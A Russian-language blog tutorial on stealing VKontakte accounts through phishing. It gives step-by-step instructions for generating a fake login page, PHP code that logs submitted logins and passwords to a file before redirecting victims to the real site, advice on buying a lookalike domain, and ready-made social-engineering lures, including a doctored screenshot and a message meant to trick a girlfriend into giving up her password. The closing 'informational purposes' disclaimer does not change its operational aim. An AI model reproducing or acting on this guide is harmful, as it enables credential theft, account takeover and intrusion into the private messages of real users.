Новичку полезно

  • А знаете ли вы что?

    - rudvs - мой стиль жизни!


Фишинг - взлом вконтакте

Теги: Социальная инженерия, фишинг, взлом вконтакте, Total Commander, Фейк

Введение

  Здравствуй мой добрый друг! Последнее время, не знаю почему, стал очень актуальный вопрос, как и каким способом можно взломать учетную запись вконтакте.

В интернете на данную поднято не мало тем, написано не мало статей, но большинство из них или копипаст, или люди хотят выпендриться и пишут какую не будь не пригодную чушь.   На самом деле нормальной инфы найти в интернете весьма трудно среди всей этой свалки копипаста. Настоящих методов данного вконтакте очень мало, один из них прекрасно описал нам parrot в статье

   Ну, а я вам расскажу про другой вариант угона учетных записей вконтакте — это фишинг, про данный вид атаки вы можете прочитать в моей статье. Да, да мы сегодня будем учиться, как сделать подставной сайт и впихнуть его ушастому юзеру и полакомиться учетными записями с всемогучей соц., сети вконтакте :). И так, на этом вступление закончено, теперь переходим к делу :).

 Подготовка

  Занятие фишингом дело весьма интересное, но для его полноценной работы оно бывает слегка затратное(ну не совсем). И так, что нам нужно для проведения фишинга?

  Во первых нам нужно сделать копию самого сайта вконтакте — но не всего сайта, а одной лиш странички которая просит нас ввести данный для аутентификации (Логин и пароль). Для этого можно воспользоваться кучей программ для скачивания сайтов или создания фейков, но я отдаю предпочтение программе arxwfakegen которую можно скачать на нашем сайте Здесь

  Данная программа довольно проста в использовании и думаю не должна вызвать у вас затруднений в понимании, тем болие мы будем дальше говорить о том как ей пользоваться.

  Едем далее нам нужно разместить свой фейк на каком не будь из хостингов, бесплатном с доменом второго уровня или платном с доменом первого уровня, что весьма внушительней смотрится и вызовет меньше подозрений у юзверя. О выборе хостинга мы еще поговорим ниже, я посвятил этому целый заголовок.

  После размещения вам необходимо, что бы юзверы сайта вконтакте переходиле по вашей ссылке и вводили логин и пароль от своей учетной записи, для этого нужно немного постараться и поднапречь мозг для создания агитационного сообщения которое будет заставлять переходить людей по вашей ссылке. Но данный этап должен рассматриваться только после того как вы вибирете хостин и доменое имя. Об этом так же мы поговорим ниже.

  Вот в принципе и все, что нужно нам для подготовки, программу скачали, морально подготовились, можно теперь приступать к делу.

Создаем фейк 


  И так рапаковываем программу из архива, запускаем и в правом верхнем угла в выпадающем списке (под названием шаблоны) выбираем «Вход Vkontakte.ru». Далее ставим галочки на «Удалять события OnSubmit» и «Удалять все JavaScript». В конце у вас должно получиться как представлено на картинке.

 

Подготовка к созданию фейка

 

 

 

 

 

 

  Теперь смело нажимаем кнопку «Создать»! Через несколько секунд перед вами выскочит окошко под названием «перехват полей», в нем вы должны будете выбрать поля которые будут перехвачены и занесены в вашу Базу Данных на хостинге. В нашем случае нам понадобятся поля «login» и «pass» ставим галочки и нажимаем продолжить.

 

Поставьте галочки как изображено на рисунке

 

 

 

 

 

 

 

 

 

 

 

 

 

 

  А теперь перед вами появляется окно которое оповещает вас об успешно проделанной работе, нажимаем далее и можно считать, что фейк готов. Осталось его немного поправить.

  В папке где лежит программа должно появиться три файла «index.php», «login.php» «base.php». Теперь открываем в блокноте файл «index.php» и находим строчку


form method="post" name="login" id="login" action="/login.php" onsubmit="if (vklogin) { return true} else { document.login.submit();return false;}"

 

и убераем слеш перед словом login.php. То есть сейчас так action="/login.php" а должно стать вот так action="login.php". Теперь сохраняем и закрываем, следующим идет файл «login.php», его открываем в блокноте и заменяем все, что там есть на это:

?php

$LOCATION="http://vkontakte.ru/";

$BASE="base.php";

$p0=$_REQUEST["login"];

$p1=$_REQUEST["pass"];

$info="$p0:$p1:\n";

$fd=fopen($BASE,"a+");

fwrite($fd,$info);

fclose($fd);

header("Location:$LOCATION");

?>

  Этот код перехватывает введенные данные с полей «логин» и «пароль» и записывает их в файл «base.php», откуда вы и будете получать сладенькие конфиденциальные данные ушастых юзверей.     И так создание фейка закончено теперь переходим к выбору хостинга и размещению псевдо сайта.

Выбираем хостинг

  От выбора хостинга зависит каков будет результат, вообще правельный выбор намного упрощает работу.

  Проблема всегда лиш в одном — это в деньгах, все хотят использовать все на 100% но не заплатить за это не копейки. Как известно за хорошее нужно платить и если вы хотите получить удачный результат то вам понадобится сузить толщину вашего кошелька на несколько милимметров. Надеюсь это не много? :). Можно конечно же воспользоваться бесплатным хостингом, но тогда юзер должен быть с очень большими ушами, что бы не заметить подставу.А теперь давайте рассмотрим где и как мы можем разместить наш недавно созданный фейк?

  Платный хостинг и домен первого уровня — на мой взгляд самый удачный вариант, так как домен можно подобрать максимально похожим а так же можно взять домен .РФ который можно купить за 99 р. вот например домен «вкконтрахте.рф» свободен и это будет весьма убедительно и не должно вызывать подозрения а так же придумать и реализовать миф под этот домен будет проще простого. Так же для домена необходимо купить место на хостинге, это вообще дешево, в самом низу на нашем сайте ты можешь увидеть ссылку «Хостинг и Регистрация Доменов» нажми на картинку и попадешь на сайт самого дешового и удобного хостера в РуНете, стоимость хостинга за месяц всего 33 рубля. И в общей сложности у вас потребует 132 рубля, думаю даже школьнику эта сумма доступна, не поесть один раз в столовой :).

  Бесплатный хостинг и домен второго уровня — данный вариант слишком палевный, любой человек который хоть раз читал минимальную информацию по безопасности в интернете о том, что не нужно ходить по не известным сайтам так как они могу приносить вред вашему компьютеру, да и сам вконтакте предупреждает об этом при переходе по ссылке на какой не будь сайт. Так, что не гарантирую, что данный способ будет работать так как вам нужно. Бесплатным хостингом можно воспользоваться например этим http://hut.ru. Домен предоставляет потдержку php скриптов а это то, что нам нужно. Но вот еще одна проблемка этот хостинг выкладывает большой баннер на страничку на любом вашем сайте а он весьма большой и по этому от него нужно избавиться, банер можно отключить но за определенную плату, вообще не вижу смысла брать бесплатный хостинг и еще платить за баннер, проще взять платный хостинг с нормальным доменом, так как домен полученый на бесплатном хостинге будет иметь вид vkontakte.hut.ru мне кажется слишком заметно и придумывать миф для данного домена будет весьма затруднительно.

  И так допустим вы зарегестрировали себе домен и взяли хостинг, теперь нужно засунуть наши три файла на хостинг «index.php», «login.php» «base.php». Сделать это можно присоеденившись через программу Total Commander выбрав в меню создать новое подключение к FTP.

   Теперь опять заходим через Total Commander заходим на сервер и выбираем редактировать файл base.php. Откроется блокнот и в самом низу документа вы увидете те данные которые вы недавно вводили.

  И так все работает теперь переходим к впариванию нашего псевдо сайта, в этом нам может помочь только социальная инженерия.

 

Используем социальную инженерию


  И так, как я говорил ранее результат зависит от того каким доменом вы воспользуйтесь первого уровня имя.рф имя.ru или же второго имя.hut.tu Ну, в любом случае мы будем рассматривать два варианта и так поехали.

  1. Предаствим, что вы купили платный домен например в зоне .РФ и он получился у вас вкконтрахте.рф(вы можете найти любой другой, я просто нашел свободным этот). И так домен у нас есть теперь нужно определиться с жертвой а может быть и с жертвами смотря на какие масштабы вы нацелены. Для этого вам нужна желательна другая учетная запись. Создаете группу вконтакте и называете ее например «Новые возможности новых доменов вконтакте» закрываешь там все что можно, не даешь коментировать обсуждать и остальное барахло, делаешь красивую картинку с логотипом вконтакте и с подписью например нескольких доменов в зоне .РФ (вконтакте.рф, вконтрахте.рф, вкконтрахте.рф). Создаешь тему и описываешь типа контакт запустил новую ветку доменов и один из них вкконтрахте.рф имеет уникальную возможность, может это косяк программистов может так задуманно для собственного использования, эти домены ты вообще нашел случайна тыкая пальцами, так вот на этом домене вводишь данные от своей учетной записи и можно просматривать все закрытные учетки например твоих знакомых ну и ряд другой лабуды. Расписав все красиво и убедительно начинаешь приглашать всех людей которые тебе нужны или всех подряд как тебе удобнее. И через некоторое время открываешь опять  файл base.php  и наслаждаешься полученными данными.
  2. Допустим вы зарегестрировали себе бесплатный хостинг и получили себе домен второго уровня например vkontakte.hut.ru, то лигенду можно придумать например следущую. Делайте Print screen вашей странички вконтакте редактируйте полученное изображение в паинте изменяя ваши голоса например на 999. Сохраняете у себя на компьютере и заходите на свою любимую почту и выбирайте список кому вы будете отправлять сообщения, например какой не будь подружке пиши текст «Привет Марин, обалдеть че я за сервер нарыл вообще попутать, короче заходишь на этот сайт vkontakte.hut.ru вводишь свои данные и тебе начисляют 999 голосов, ну это не для всех учеток, но для моей прокатило, сперва думал разводка, а сам проверил вот результат можешь посмотреть на картинке которую я тебе прислал.». Прекрепляете картинку и отправляете получателю, думаю в ответ придет что то вроде этого «Ничего не получилось :(». Теперь смело идете на сервер открываете уже известный файл base.php и заходите смело под учетной записью твоей подружки.

  Вот такие вот способы которые я сгенерировал в данный момент, а таких компбинаций можно придумать валом. Просто включай голову!

Заключение

 

  Данный метод используют спамеры для получения акков а потом для последующей продажи или спама, помница мне в 2009 году угнали 50000 учетных записей и опубликовали на сайте который закрыли через 3 часа :). Но способ будет работать пока не иссякнет ваша фантазия и пока не исчезнут ушастые юзвери, но это все миф ушастики будут всегда :).

 

От автора

  Вообще данный материал представлен чисто в ознакомительных целях и автор статьи не несет никакой ответственности. И вообще если сомневаешься в своей подружке то лучше беги от нее иначе проверка ее переписки тебя весьма удевит. :) И так на сегодня все, все бб.

 

 

 

Добавить комментарий


Обновить